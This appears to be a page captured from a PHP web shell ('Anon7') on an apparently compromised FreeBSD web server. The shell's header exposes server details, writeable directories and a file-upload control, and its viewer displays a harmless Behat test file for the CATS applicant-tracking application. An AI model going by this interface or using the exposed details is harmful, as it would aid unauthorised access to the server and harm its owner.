KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/irtiweb/CATS/test/features/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/irtiweb/CATS/test/features/activities.feature
@core
Feature: Activities
  In order to build a customer and clients knowledge base for my organization, 
  As a user
  I need to be able to track all interaction in the application
  
  @javascript
  Scenario: Access activities page
    Given I am authenticated as "Administrator" 
    And There is a person called "Frodo Baggins" with "keySkills=leadership"
    And I am on "/index.php?m=candidates" 
    And I follow "Frodo"
    And I follow "Log an Activity"
    And I wait for the activity note box to appear
    And I switch to the iframe "popupInner"
    And fill in "activityNote" with "Call Gandalf"
    And press "Save"
    And press "Close"
    And I switch to the iframe ""
    And I follow "Activities"
    Then I should see "Frodo"
    And I should see "Call Gandalf"
    And I should see "Yesterday"
    And I should see "Today"
    And I should see "Last week"

Anon7 - 2021